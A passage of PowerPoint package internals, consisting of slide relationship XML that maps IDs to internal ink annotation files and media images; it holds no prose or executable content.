Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1205.xml"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1212.xml"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1220.xml"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1320.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1099.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1114.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1680.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1135.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1880.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1148.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1156.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1163.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1960.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2030.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2112.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1171.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2212.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1182.xml"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1192.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1086.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1400.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1550.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1122.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1190.xml"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1200.xml"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1215.xml"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1270.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1094.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1490.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1108.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1109.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1630.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1130.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1760.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1840.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1143.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1151.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1240.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1083.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1912.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2060.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1166.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2190.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2290.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1350.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1174.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1185.xml"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1195.xml"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1223.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1102.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1580.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1125.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1790.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1146.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1990.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2012.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1300.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1169.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1180.xml"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2320.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1218.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1097.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1530.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1120.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1740.png"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1470.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1141.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1940.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1164.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2170.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2270.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1206.xml"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1213.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1092.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1115.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1136.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1890.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1157.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1159.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2120.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2220.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image383.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1201.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1087.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1412.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1110.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1104.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1131.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1152.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink122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2070.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1175.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1186.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1360.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1103.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1590.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1196.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1126.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1147.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2000.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1219.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1170.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1181.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1098.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1121.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1142.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1214.xml"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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4.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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455.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink458.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink463.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink466.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink471.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink483.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink487.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink491.xml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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink456.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink461.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink469.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink475.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294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478.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink482.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink460.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink468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211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink486.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink490.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink453.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink459.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink464.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink472.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink476.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink479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488.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink467.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink474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image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink481.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink485.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink489.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink492.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink454.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink462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457.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink470.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink473.xml"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink477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62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80.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink484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10.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink46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.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink526.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink539.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink547.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink558.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink565.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink587.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink573.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink508.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink521.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink534.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink497.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink501.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink542.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink550.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink555.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink582.xml"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink568.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink516.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink529.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink537.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink545.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink561.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink577.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink563.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink574.xml"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink585.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image960.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 